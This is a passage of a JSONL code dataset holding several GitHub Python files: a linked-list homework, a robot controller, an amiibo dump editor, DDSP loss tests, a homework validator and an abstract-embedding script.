fib(z))\n\nprint(sol)\nif sol.check()==sat:\n mod = sol.model()\n # print(\"x:\", mod.eval(x))\n print(\"z:\", mod.eval(z), \"y:\", mod.eval(y))\n sol.add(z != mod.eval(z),y != mod.eval(y))\n","repo_name":"hakank/hakank","sub_path":"z3/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"7"}
+{"seq_id":"13777544241","text":"# Nama: Evry Nazyli Ciptanto\n# NIM: 0110220045\n# Kelas: TI 08\n\nclass Node:\n def __init__(self, data = None, next = None):\n self.data = data\n self.next = next\n \nclass LinkedList:\n def __init__(self, head = None):\n self.head = head\n \n def add_last(self, new_data):\n if self.head is None:\n self.head = Node(new_data)\n else:\n current = self.head\n while current.next is not None:\n current = current.next\n current.next = Node(new_data)\n \n def cetak(self):\n if self.head is None:\n print('List kosong')\n else:\n current = self.head\n while current is not None:\n print(current.data, end=' ')\n current = current.next\n print()\n\n def sum_odd(self):\n # Tuliskan implementasi fungsi sum_odd() di bawah ini\n # Hapus pass jika implementasi sudah dibuat\n # membuat variabel awal x = 0\n x = 0\n # inisialisasi element pertama\n current_node = self.head\n # kondisi perulangan selama element tidak none\n while current_node is not None:\n # kondisi untuk mencari bilangan ganjil\n if(current_node.data % 2 != 0):\n # menambahkan data ke element x\n x += current_node.data\n # incremenet atau pindah ke element berikutnya\n current_node = current_node.next\n # mengembalikan hasil\n return x\n \n def get_max(self):\n # Tuliskan implementasi fungsi get_max() di bawah ini\n # Hapus pass jika implementasi sudah dibuat\n # inisialisasi element pertama\n current_node = self.head\n # jika element pertama none\n if current_node == None:\n # kembalikan nilai none\n return\n # kondisi yang lain\n else :\n # membuat variabel awal x = 0\n x = 0\n # kondisi perulangan selama element tidak none\n while current_node is not None:\n # kondisi untuk mencari bilangan max\n if x < current_node.data:\n # jika kondisi terpenuhi set x dengan nilai element\n x = current_node.data\n # incremenet atau pindah ke element berikutnya\n current_node = current_node.next\n # mengembalikan bilangan terbesar\n return x\n\n\n# Mulai baris ini hingga baris paling bawah\n# digunakan untuk mengetes fungsi yang telah dibuat.\n# Tidak perlu mengubah bagian ini.\n# Ketika dijalankan, program akan menampilkan contoh\n# pemanggilan fungsi dan solusi yang seharusnya.\n# Cocokkan hasil pemanggilan fungsi dengan solusi \n# yang seharusnya.\ndef test():\n list1 = LinkedList()\n list1.add_last(1)\n list1.add_last(2)\n list1.add_last(3)\n list1.add_last(4)\n list1.add_last(5)\n print('list1 : ', end='')\n list1.cetak()\n r1 = list1.sum_odd()\n print(f\"list1.sum_odd() = {r1} \\t(solusi: 9)\")\n r2 = list1.get_max()\n print(f\"list1.get_max() = {r2} \\t(solusi: 5)\")\n print()\n\n list2 = LinkedList()\n list2.add_last(9)\n list2.add_last(9)\n list2.add_last(9)\n print('list2 : ', end='')\n list2.cetak()\n r1 = list2.sum_odd()\n print(f\"list2.sum_odd() = {r1} \\t(solusi: 27)\")\n r2 = list2.get_max()\n print(f\"list2.get_max() = {r2} \\t(solusi: 9)\")\n print()\n\n list3 = LinkedList()\n list3.add_last(6)\n list3.add_last(2)\n list3.add_last(8)\n list3.add_last(4)\n print('list3 : ', end='')\n list3.cetak()\n r1 = list3.sum_odd()\n print(f\"list3.sum_odd() = {r1} \\t(solusi: 0)\")\n r2 = list3.get_max()\n print(f\"list3.get_max() = {r2} \\t(solusi: 8)\")\n print()\n\n list4 = LinkedList()\n print('list4 : ', end='')\n list4.cetak()\n r1 = list4.sum_odd()\n print(f\"list4.sum_odd() = {r1} \\t(solusi: 0)\")\n r2 = list4.get_max()\n print(f\"list4.get_max() = {r2} \\t(solusi: None)\")\n print()\n\nif __name__ == '__main__':\n test()","repo_name":"Nazyli/DDP-TI08-Lab-10","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"39947074798","text":"import math\n\n\ndef main(x, y):\n storage = 0.\n n = len(x)\n for i in range(1, n):\n storage += math.sin(y[n - math.ceil(i / 3)]**2 + 58*x[i])**7\n return 13*storage\n\n\nprint(main([-0.22, -0.76, -0.89], [-0.14, -0.14, 0.54]))\n","repo_name":"ucantjugglikeme/python_exam","sub_path":"Task5v5.py","file_name":"Task5v5.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74165464544","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 9 10:46:14 2018\n\n@author: alxgr\n\"\"\"\n\n###############################################################################\nimport numpy as np\nfrom scipy.interpolate import interp1d\n###############################################################################\nfrom pyro.control import controller\nfrom pyro.dynamic import mechanical\n###############################################################################\n\n\n\n\n###############################################################################\n# Computed Torque\n###############################################################################\n \nclass ComputedTorqueController( controller.StaticController ) :\n \"\"\" \n Inverse dynamic controller for mechanical system\n\n \"\"\" \n \n ############################\n def __init__(self, model = mechanical.MechanicalSystem() , traj = None ):\n \"\"\"\n \n ---------------------------------------\n r : reference signal vector k x 1\n y : sensor signal vector p x 1\n u : control inputs vector m x 1\n t : time 1 x 1\n ---------------------------------------\n u = c( y , r , t )\n \n \"\"\"\n \n self.model = model\n \n # Dimensions\n self.k = model.dof \n self.m = model.m\n self.p = model.p\n \n super().__init__(self.k, self.m, self.p)\n \n # Label\n self.name = 'Computed Torque Controller'\n \n # Params\n self.w0 = 1\n self.zeta = 0.7 \n \n # Mode\n if traj == None:\n self.c = self.c_fixed_goal\n else:\n self.load_trajectory( traj )\n self.mode = 'interpol'\n self.c = self.c_trajectory_following\n \n \n #############################\n def c_fixed_goal( self , y , r , t = 0 ):\n \"\"\" \n Feedback static computation u = c(y,r,t)\n \n INPUTS\n y : sensor signal vector p x 1\n r : reference signal vector k x 1\n t : time 1 x 1\n \n OUPUTS\n u : control inputs vector m x 1\n \n \"\"\"\n \n x = y \n q_d = r\n \n u = self.fixed_goal_ctl( x , q_d , t )\n \n return u\n \n \n \n ############################\n def fixed_goal_ctl( self , x , q_d , t = 0 ):\n \"\"\" \n \n Given desired fixed goal state and actual state, compute torques\n \n \"\"\"\n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d = np.zeros( self.model.dof )\n dq_d = np.zeros( self.model.dof )\n\n ddq_r = self.compute_ddq_r( ddq_d , dq_d , q_d , dq , q )\n \n u = self.model.actuator_forces( q , dq , ddq_r )\n \n return u\n \n \n ############################\n def compute_ddq_r( self , ddq_d , dq_d , q_d , dq , q ):\n \"\"\" \n \n Given desired trajectory and actual state, compute ddq_r\n \n \"\"\"\n \n q_e = q - q_d\n dq_e = dq - dq_d\n \n ddq_r = ddq_d - 2 * self.zeta * self.w0 * dq_e - self.w0 ** 2 * q_e\n \n return ddq_r\n \n \n ############################\n def load_trajectory( self , traj ):\n \"\"\" \n \n Load Open-Loop trajectory solution to use as reference trajectory\n \n \"\"\"\n \n self.trajectory = traj\n \n q = traj.x[ :, 0 : self.model.dof ]\n dq = traj.x[ :, self.model.dof : 2 * self.model.dof ]\n ddq = traj.dx[:, self.model.dof : 2 * self.model.dof ]\n t = traj.t\n \n # Create interpol functions\n self.q = interp1d(t,q.T)\n self.dq = interp1d(t,dq.T)\n self.ddq = interp1d(t,ddq.T)\n \n \n ############################\n def get_traj( self , t ):\n \"\"\" \n \n Find closest point on the trajectory\n \n \"\"\"\n \n if t < self.trajectory.time_final :\n\n # Load trajectory\n q = self.q( t )\n dq = self.dq( t )\n ddq = self.ddq( t ) \n\n else:\n \n q = self.rbar\n dq = np.zeros( self.model.dof )\n ddq = np.zeros( self.model.dof )\n \n return ddq , dq , q\n \n \n ############################\n def traj_following_ctl( self , x , t = 0 ):\n \"\"\" \n \n Given desired loaded trajectory and actual state, compute torques\n \n \"\"\"\n \n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d , dq_d , q_d = self.get_traj( t )\n\n ddq_r = self.compute_ddq_r( ddq_d , dq_d , q_d , dq , q )\n \n u = self.model.actuator_forces( q , dq , ddq_r )\n \n return u\n \n \n #############################\n def c_trajectory_following( self , y , r , t ):\n \"\"\" \n Feedback static computation u = c(y,r,t)\n \n INPUTS\n y : sensor signal vector p x 1\n r : reference signal vector k x 1\n t : time 1 x 1\n \n OUPUTS\n u : control inputs vector m x 1\n \n \"\"\"\n \n x = y \n \n u = self.traj_following_ctl( x , t )\n \n \n return u\n \n\n\n##############################################################################\n \nclass SlidingModeController( ComputedTorqueController ):\n \"\"\" \n Sliding Mode Controller for fully actuated mechanical systems\n \"\"\"\n \n \n ############################\n def __init__( self , model , traj = None ):\n \"\"\" \"\"\"\n \n super().__init__( model , traj )\n \n # Params\n self.lam = 1 # Sliding surface slope\n self.gain = 1 # Discontinuous gain\n self.nab = 0.1 # Min convergence rate\n \n \n ############################\n def compute_sliding_variables( self , ddq_d , dq_d , q_d , dq , q ):\n \"\"\" \n \n Given desired trajectory and actual state\n \n \"\"\" \n q_e = q - q_d\n dq_e = dq - dq_d\n \n s = dq_e + self.lam * q_e\n dq_r = dq_d - self.lam * q_e\n ddq_r = ddq_d - self.lam * dq_e\n \n return [ s , dq_r , ddq_r ]\n \n \n ############################\n def K( self , q , t ):\n \"\"\" Discontinuous gain matrix \"\"\"\n \n dist_max = np.diag( np.ones( self.model.dof ) ) * self.gain\n conv_min = np.diag( np.ones( self.model.dof ) ) * self.nab\n \n K = dist_max + np.dot( self.model.H( q ) , conv_min ) \n \n return K\n \n \n ############################\n def sliding_torque( self , ddq_r , s , dq , q , t ):\n \"\"\" \n \n Given actual state, compute torque necessarly to guarantee convergence\n \n \"\"\"\n \n u_computed = self.model.actuator_forces( q , dq , ddq_r )\n \n u_discontinuous = np.dot( self.K( q , t ) , np.sign( s ) )\n \n u_tot = u_computed - u_discontinuous\n \n return u_tot\n \n \n ############################\n def traj_following_ctl( self , x , t = 0 ):\n \"\"\" \n \n Given desired loaded trajectory and actual state, compute torques\n \n \"\"\"\n \n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d , dq_d , q_d = self.get_traj( t )\n\n [ s , dq_r , ddq_r ] = self.compute_sliding_variables( ddq_d , dq_d , \n q_d , dq , q )\n \n u = self.sliding_torque( ddq_r , s , dq , q , t )\n \n return u\n \n \n ############################\n def fixed_goal_ctl( self , x , q_d , t = 0 ):\n \"\"\" \n \n Given desired fixed goal state and actual state, compute torques\n \n \"\"\"\n \n [ q , dq ] = self.model.x2q( x ) \n \n ddq_d = np.zeros( self.model.dof )\n dq_d = np.zeros( self.model.dof )\n\n [ s , dq_r , ddq_r ] = self.compute_sliding_variables( ddq_d , dq_d , \n q_d , dq , q )\n \n u = self.sliding_torque( ddq_r , s , dq , q , t )\n \n return u\n\n \n'''\n#################################################################\n################## Main ########\n#################################################################\n'''\n\n\nif __name__ == \"__main__\": \n \"\"\" MAIN TEST \"\"\"\n \n from pyro.dynamic import pendulum\n\n\n sys = pendulum.DoublePendulum()\n ctl = ComputedTorqueController( sys )\n \n # New cl-dynamic\n cl_sys = ctl + sys\n \n cl_sys.x0 = np.array([2,1,0,0])\n cl_sys.compute_trajectory()\n cl_sys.plot_phase_plane_trajectory(0,2)\n cl_sys.animate_simulation()\n \n","repo_name":"alx87grd/AlexRobotics","sub_path":"pyro/control/nonlinear.py","file_name":"nonlinear.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"}
+{"seq_id":"25925928618","text":"from amiibo import AmiiboDump\nfrom amiibo.crypto import AmiiboBaseError\nimport copy\n\nclass InvalidAmiiboDump(AmiiboBaseError):\n pass\n\nclass IncorrectGameDataIdException(Exception):\n pass\n\n\nclass InvalidSsbuChecksum(Exception):\n pass\n\nclass SsbuAmiiboDump(AmiiboDump):\n \"\"\"\n Class that's a thin wrapper around AmiiboDump.\n Checks the amiibo has the super smash bros game id in the game data section on unlock\n Writes the HMAC for the game data before locking\n \"\"\"\n def __init__(self, master_keys, dump, is_locked=True):\n super().__init__(master_keys, dump, is_locked)\n self.dumpcopy = copy.deepcopy(self)\n if is_locked == True:\n self.dumpcopy.unlock()\n\n def unlock(self, verify=True):\n super().unlock(verify=verify)\n\n # Checks if the amiibo's game is Super Smash Bros. Ultimate, and if not, we initialize it.\n if bytes(self.data[266:270]).hex() != \"34f80200\":\n self.data[0x14] = self.data[0x14] | (1 << 5)\n self.data[266:270] = bytes.fromhex(\"34f80200\")\n self.data[0x100:0x108] = bytes.fromhex('01006A803016E000')\n self.data[0x130:0x208] = bytes.fromhex(\"00\" * 0xD8)\n self.data[304:308] = self._calculate_crc32(self.data[308:520]).to_bytes(4, \"little\")\n\n if self.data[304:308].hex() != self._calculate_crc32(self.data[308:520]).to_bytes(4, \"little\").hex():\n raise InvalidSsbuChecksum(f'The checksum for this game data is not correct. Please use an untampered amiibo')\n\n def lock(self):\n if self.data[444:502] != self.dumpcopy.data[444:502]:\n self.data[311] = self.data[311] | 1\n if self.amiibo_nickname[-1] != '□':\n if len(self.amiibo_nickname) == 10:\n self.amiibo_nickname = self.amiibo_nickname[:-1] + '□'\n else:\n self.amiibo_nickname = self.amiibo_nickname + '□'\n elif self.dumpcopy.amiibo_nickname[-1] == '□' and self.amiibo_nickname[-1] != '□':\n if len(self.amiibo_nickname) == 10:\n self.amiibo_nickname = self.amiibo_nickname[:-1] + '□'\n else:\n self.amiibo_nickname = self.amiibo_nickname + '□'\n checksum = self._calculate_crc32(self.data[308:520])\n mii_checksum = str(hex(self.crc16_ccitt_wii(self.data[0xA0:0xFE]))).lstrip('0x')\n while len(mii_checksum) < 4:\n mii_checksum = '0' + mii_checksum\n self.data[304:308] = checksum.to_bytes(4, \"little\")\n self.data[0xFE:0x100] = bytes.fromhex(mii_checksum)\n super().lock()\n\n @staticmethod\n def _calculate_crc32(input):\n # Setup CRC 32 table. Translated from js to python from amiibox codebase\n # (should move this out so it sets up once, but it's quick enough as is)\n p0 = 0xEDB88320 | 0x80000000\n p0 = p0 >> 0\n\n u0 = [0] * 0x100\n i = 1\n while (i & 0xFF):\n t0 = i\n for _ in range(8):\n b = (t0 & 0x1) >> 0\n t0 = (t0 >> 0x1) >> 0\n if b:\n t0 = (t0 ^ p0) >> 0\n u0[i] = t0 >> 0\n i += 1\n\n # Calculate CRC32 from table\n t = 0x0\n for k in input:\n t = ((t >> 0x8) ^ u0[(k ^ t) & 0xFF]) >> 0\n return (t ^ 0xFFFFFFFF) >> 0\n\n def crc16_ccitt_wii(self, data):\n crc = 0\n\n for byte in data:\n byte = int.from_bytes([byte], 'big')\n\n crc = crc ^ (byte << 8)\n\n for _ in range(8):\n crc = crc << 1\n\n if (crc & 0x10000) > 0:\n crc ^= 0x1021\n\n return (crc & 0xFFFF)\n\n\n @property\n def amiibo_nickname(self):\n # TODO: why is the Amiibo nickname big endian,\n # but the Mii nickname litle endian?\n return self.data[0x020:0x034].decode('utf-16-be').rstrip('\\x00')\n\n @amiibo_nickname.setter\n def amiibo_nickname(self, name):\n utf16 = name.encode('utf-16-be')\n if len(utf16) > 20:\n raise ValueError\n self.data[0x020:0x034] = utf16.ljust(20, b'\\x00')\n","repo_name":"jozz024/smash-amiibo-editor","sub_path":"utils/ssbu_amiibo.py","file_name":"ssbu_amiibo.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"7"}
+{"seq_id":"9718059918","text":"from ddsp import core\nfrom ddsp import losses\nimport numpy as np\nimport tensorflow as tf\n\n\nclass LossGroupTest(tf.test.TestCase):\n\n def setUp(self):\n \"\"\"Create some dummy input data for the chain.\"\"\"\n super().setUp()\n\n # Create a network output dictionary.\n self.nn_outputs = {\n 'audio': tf.ones((3, 8000), dtype=tf.float32),\n 'audio_synth': tf.ones((3, 8000), dtype=tf.float32),\n 'magnitudes': tf.ones((3, 200, 2), dtype=tf.float32),\n 'f0_hz': 200 + tf.ones((3, 200, 1), dtype=tf.float32),\n }\n\n # Create Processors.\n spectral_loss = losses.SpectralLoss()\n crepe_loss = losses.PretrainedCREPEEmbeddingLoss(name='crepe_loss')\n\n # Create DAG for testing.\n self.dag = [\n (spectral_loss, ['audio', 'audio_synth']),\n (crepe_loss, ['audio', 'audio_synth']),\n ]\n self.expected_outputs = [\n 'spectral_loss',\n 'crepe_loss'\n ]\n\n def _check_tensor_outputs(self, strings_to_check, outputs):\n for tensor_string in strings_to_check:\n tensor = core.nested_lookup(tensor_string, outputs)\n self.assertIsInstance(tensor, (np.ndarray, tf.Tensor))\n\n def test_dag_construction(self):\n \"\"\"Tests if DAG is built properly and runs.\n \"\"\"\n loss_group = losses.LossGroup(dag=self.dag)\n print('!!!!!!!!!!!', loss_group.dag, loss_group.loss_names, self.dag)\n loss_outputs = loss_group(self.nn_outputs)\n self.assertIsInstance(loss_outputs, dict)\n self._check_tensor_outputs(self.expected_outputs, loss_outputs)\n\n\nclass SpectralLossTest(tf.test.TestCase):\n\n def test_output_shape_is_correct(self):\n \"\"\"Test correct shape with all losses active.\"\"\"\n loss_obj = losses.SpectralLoss(\n mag_weight=1.0,\n delta_time_weight=1.0,\n delta_freq_weight=1.0,\n cumsum_freq_weight=1.0,\n logmag_weight=1.0,\n loudness_weight=1.0,\n )\n\n input_audio = tf.ones((3, 8000), dtype=tf.float32)\n target_audio = tf.ones((3, 8000), dtype=tf.float32)\n\n loss = loss_obj(input_audio, target_audio)\n\n self.assertListEqual([], loss.shape.as_list())\n self.assertTrue(np.isfinite(loss))\n\n\n\n\nclass PretrainedCREPEEmbeddingLossTest(tf.test.TestCase):\n\n def test_output_shape_is_correct(self):\n loss_obj = losses.PretrainedCREPEEmbeddingLoss()\n\n input_audio = tf.ones((3, 16000), dtype=tf.float32)\n target_audio = tf.ones((3, 16000), dtype=tf.float32)\n\n loss = loss_obj(input_audio, target_audio)\n\n self.assertListEqual([], loss.shape.as_list())\n self.assertTrue(np.isfinite(loss))\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"magenta/ddsp","sub_path":"ddsp/losses_test.py","file_name":"losses_test.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":2656,"dataset":"github-code","pt":"7"}
+{"seq_id":"24403063213","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Validator script for CS 2204 Homework submissions\"\"\"\nimport sys\nimport os\nimport traceback\nfrom contextlib import redirect_stdout, redirect_stderr\nfrom importlib.util import spec_from_file_location, module_from_spec\nfrom io import StringIO\n\nimport pycodestyle\n\n\n#########################################################################\n# Test infrastructure\n\ndef points(val):\n \"\"\"Simple decorator to add a __points__ property to a function\n Usage: @points(10)\n \"\"\"\n def decorator(func):\n func.__points__ = val\n return func\n return decorator\n\n\ndef abort(func):\n \"\"\"Simple decorator to add a __abort__ property to a function\"\"\"\n func.__abort__ = True\n return func\n\n\ndef import_file(filename, module_name=None):\n \"\"\"Import a file with a given module name. Returns the module object\"\"\"\n if module_name is None:\n module_name, _ = os.path.splitext(os.path.basename(filename))\n spec = spec_from_file_location(module_name, filename)\n module = module_from_spec(spec)\n spec.loader.exec_module(module)\n return module\n\n\ndef run_file(filename):\n \"\"\"Runs the file at the top-level. Returns standard output, error tuple\"\"\"\n with StringIO() as stdout, StringIO() as stderr:\n with redirect_stdout(stdout), redirect_stderr(stderr):\n import_file(filename, \"__main__\")\n out = stdout.getvalue()\n err = stderr.getvalue()\n\n return out, err\n\n\ndef check_pep8_style(filename):\n \"\"\"Checking PEP8 style for filename. Returns n_errors, messages tuple\"\"\"\n\n with StringIO() as out, \\\n redirect_stdout(out), \\\n redirect_stderr(sys.stdout):\n\n pep8_checker = pycodestyle.Checker(filename, show_source=True)\n pep8_errors = pep8_checker.check_all()\n pep8_msgs = out.getvalue()\n\n return pep8_errors, pep8_msgs\n\n\ndef validate(*tests):\n \"\"\"Validation function\"\"\"\n total_score = 0\n divider = \"-\" * 45\n\n for test in tests:\n max_points = getattr(test, \"__points__\", 0)\n abort = False\n\n print(divider)\n prefix = f\"{test.__doc__}:\"\n print(f\"{prefix:<{len(divider) - 10}}\", end=\"\")\n try:\n with StringIO() as out, \\\n redirect_stdout(out), \\\n redirect_stderr(sys.stdout):\n\n partial = test()\n msg = out.getvalue()\n\n except: # noqa\n with StringIO() as tb_out:\n traceback.print_exc(limit=-1, file=tb_out)\n msg = tb_out.getvalue()\n\n points = min(max_points, 0)\n abort = getattr(test, \"__abort__\", False)\n\n else:\n if partial is not None:\n points = partial\n else:\n points = max(max_points, 0)\n\n suffix = \"ok\"\n if max_points <= 0:\n if points != 0:\n suffix = f\"{points:+d} pts\"\n else:\n suffix = f\"{points}/{max_points} pts\"\n print(f\"{suffix:>10}\")\n\n if msg:\n print(f\"\\n\\n{msg}\")\n\n total_score += points\n\n if abort:\n print(\"Aborting future tests. Fix this one, first!\")\n break\n\n total_score = max(total_score, 0)\n print(\"=\" * len(divider))\n print(f\"Final score (estimated): {total_score:.0f} pts\")\n\n\n#########################################################################\n# Assignment-specific tests\n\n# Notes:\n# You can set the max positive points for each test with @points()\n# You can also set a negative value with @points, it is interpreted as penalty.\n# If the test returns with\n# - None: max positive points are added, no penalties are applied\n# - Number: a given points are added, if negative, given penalties are applied\n# - Exception: no positive points are added, max penalties applied\n\n\n@points(10)\ndef test_codon_constructor():\n \"\"\"Testing Codon class initializer\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n\n # valid patterns\n for pattern in \"act\", \"Act\", \"CTG\":\n _ = Codon(pattern)\n\n # invalid patterns\n for pattern in None, 7, \"\", \"actg\", \"acx\":\n try:\n _ = Codon(pattern)\n except: # noqa\n pass\n else:\n print(f\"Initializer should refuse this parameter: {pattern!r}\")\n return 0\n\n\n@points(10)\ndef test_codon_str():\n \"\"\"Testing Codon string conversion\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n assert str(Codon(\"ACT\")) == \"[ACT]\"\n assert str(Codon(\"act\")) == \"[ACT]\"\n assert str(Codon(\"ggG\")) == \"[GGG]\"\n\n\n@points(10)\ndef test_codon_eq():\n \"\"\"Testing Codon equality\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n assert Codon(\"ACT\") == Codon(\"ACT\")\n assert Codon(\"ACT\") == Codon(\"act\")\n assert Codon(\"act\") != Codon(\"acg\")\n\n\n@points(10)\ndef test_codon_transcribe():\n \"\"\"Testing Codon transcription\"\"\"\n module = import_file(\"dna.py\")\n Codon = module.Codon\n assert Codon(\"ACT\").transcribe() == \"\"\n assert Codon(\"act\").transcribe() == \"\"\n assert Codon(\"acg\").transcribe() == \"\"\n\n\n@points(10)\ndef test_gene_constructor():\n \"\"\"Testing Gene class initializer\"\"\"\n module = import_file(\"dna.py\")\n Gene = module.Gene\n\n # valid patterns\n for pattern in \"\", \"ac\", \"actg\", \"actgg\", \"actggc\":\n _ = Gene(pattern)\n\n # invalid patterns\n for pattern in None, 7, \"xkcd\":\n try:\n _ = Gene(pattern)\n except: # noqa\n pass\n else:\n print(f\"Initializer should refuse this parameter: {pattern!r}\")\n return 0\n\n\n@points(10)\ndef test_gene_str():\n \"\"\"Testing Gene string conversion\"\"\"\n module = import_file(\"dna.py\")\n Gene = module.Gene\n assert str(Gene(\"\")) == \"\"\n assert str(Gene(\"ac\")) == \"\"\n assert str(Gene(\"act\")) == \"[ACT]\"\n assert str(Gene(\"actgg\")) == \"[ACT]\"\n assert str(Gene(\"actggc\")) == \"[ACT][GGC]\"\n assert str(Gene(\"actggctt\")) == \"[ACT][GGC]\"\n\n\n@points(10)\ndef test_gene_transcribe():\n \"\"\"Testing Gene transcription\"\"\"\n module = import_file(\"dna.py\")\n Gene = module.Gene\n assert Gene(\"\").transcribe() == \"\"\n assert Gene(\"ac\").transcribe() == \"\"\n assert Gene(\"act\").transcribe() == \"\"\n assert Gene(\"actgg\").transcribe() == \"\"\n assert Gene(\"actggctt\").transcribe() == \"\"\n\n\n@points(15)\ndef test_gene_contains():\n \"\"\"Testing Codon search in Gene\"\"\"\n module = import_file(\"dna.py\")\n Codon, Gene = module.Codon, module.Gene\n gene = Gene(\"actgggctgacctgttaaactgtc\")\n assert Codon(\"act\") in gene\n assert Codon(\"ggg\") in gene\n assert Codon(\"gtt\") not in gene\n assert Codon(\"ccc\") not in gene\n assert Codon(\"acg\") not in gene\n\n\n@points(15)\ndef test_gc_content():\n \"\"\"Testing GC content calculation\"\"\"\n from math import isclose\n from random import choices\n module = import_file(\"dna.py\")\n Gene = module.Gene\n for k in 10, 100, 1000:\n gene_str = \"\".join(choices(\"actg\", k=k))\n gene_str_cut = gene_str[:k - (k % 3)]\n gc_cnt = gene_str_cut.count(\"g\") + gene_str_cut.count(\"c\")\n gc_content = gc_cnt / len(gene_str_cut)\n if not isclose(gc_content, Gene(gene_str).gc_content()):\n print(f\"GC content should be {gc_content} for: \\n{gene_str}\")\n return 0\n\n\n@points(-10)\ndef test_author():\n \"\"\"Checking author information\"\"\"\n module = import_file(\"dna.py\")\n author = getattr(module, \"__author__\", None)\n assert isinstance(author, str) and author, \\\n \"__author__ variable is not set properly\"\n\n\ndef test_pep8():\n \"\"\"Checking PEP8 style\"\"\"\n\n n_errors, msgs = check_pep8_style(\"dna.py\")\n if n_errors:\n print(msgs)\n return -n_errors\n\n\nif __name__ == \"__main__\":\n validate(\n test_codon_constructor,\n test_codon_str,\n test_codon_eq,\n test_codon_transcribe,\n test_gene_constructor,\n test_gene_str,\n test_gene_transcribe,\n test_gene_contains,\n test_gc_content,\n test_author,\n test_pep8,\n )\n","repo_name":"kdmalc/data-structs-algos","sub_path":"CS2204/CS_HW3/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74665788062","text":"import os\nimport time\nimport yaml\n\nimport numpy as np\nimport batoid\nimport danish\nfrom danish import DonutFactory\n\n\ndef time_image():\n obsc = yaml.safe_load(open(os.path.join(danish.datadir, 'RubinObsc.yaml')))\n factory = DonutFactory(\n obsc_radii=obsc['radii'],\n obsc_centers=obsc['centers'],\n obsc_th_mins=obsc['th_mins'],\n )\n\n telescope = batoid.Optic.fromYaml(\"LSST_r.yaml\")\n telescope = telescope.withGloballyShiftedOptic(\"Detector\", (0,0,0.0015))\n zref = batoid.zernikeTA(\n telescope, np.deg2rad(1.67), 0.0, 620e-9,\n jmax=66, nrad=20, naz=120, reference='chief', eps=0.61\n )\n\n N = 200\n np.random.seed(123)\n t0 = time.time()\n for _ in range(N):\n aberrations = np.array(zref)\n aberrations[4] += np.random.uniform(-0.1, 0.1)\n aberrations[5:23] += np.random.uniform(-0.1, 0.1, size=18)\n aberrations *= 620e-9\n img = factory.image(\n aberrations=aberrations, thx=np.deg2rad(1.67), thy=0.0\n )\n t1 = time.time()\n print(f\"Time for factory.image(): {(t1-t0)/N*1e3:.2f} ms\")\n\n\nif __name__ == \"__main__\":\n time_image()\n","repo_name":"jmeyers314/danish","sub_path":"devel/time_image.py","file_name":"time_image.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"37781861514","text":"#!/usr/bin/env python3\n'''\nProduce CSV files easily readable by Postgres' /copy\n'''\nimport gzip\nimport json\nimport tensorflow_hub as hub\nimport pandas as pd\nimport sys\nfrom tqdm import tqdm\nfrom nltk.tokenize import sent_tokenize\nimport tensorflow as tf\n\n\ndef load_abstracts(filename):\n with open(filename) as file:\n data = json.load(file)\n paper_ids = [key for key in data.keys()]\n abstracts = [data[key] for key in paper_ids]\n paper_ids = [int(paper_id) for paper_id in paper_ids]\n del data\n return paper_ids, abstracts\n\n\ndef embed_abstracts(abstracts, paper_ids, prefix):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n if gpus:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n print('Loading USE')\n embed = hub.load(\"https://tfhub.dev/google/universal-sentence-encoder-large/5\")\n\n def embed_abstract(abstract, paper_id):\n sentences = sent_tokenize(abstract)\n sentence_embeddings = embed(sentences).numpy()\n return str(paper_id) + '\\t' + '{' + ','.join([str(v) for v in sentence_embeddings.mean(axis=0)]) + '}\\n'\n\n def write_embeddings(embeddings, filename):\n print(f'writing to {filename}')\n with open(filename, 'w') as file:\n file.writelines(embeddings)\n\n print('Computing embeddings')\n embeddings = []\n suffix = 0\n for (paper_id, abstract) in tqdm(zip(paper_ids, abstracts)):\n if len(embeddings) >= 250000:\n write_embeddings(embeddings, f'{prefix}_{suffix}.tsv')\n suffix += 1\n embeddings = []\n embeddings.append(embed_abstract(abstract, paper_id))\n suffix += 1\n write_embeddings(embeddings, f'{prefix}_{suffix}.tsv')\n\n\ndef main():\n infilename = sys.argv[1]\n outfilename = sys.argv[2]\n print(f'Loading abstracts from {infilename}')\n paper_ids, abstracts = load_abstracts(infilename)\n embed_abstracts(abstracts, paper_ids, outfilename)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"APEX-WSU/mag_50k","sub_path":"scripts/python/abstract_use_embeddings_postgres.py","file_name":"abstract_use_embeddings_postgres.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
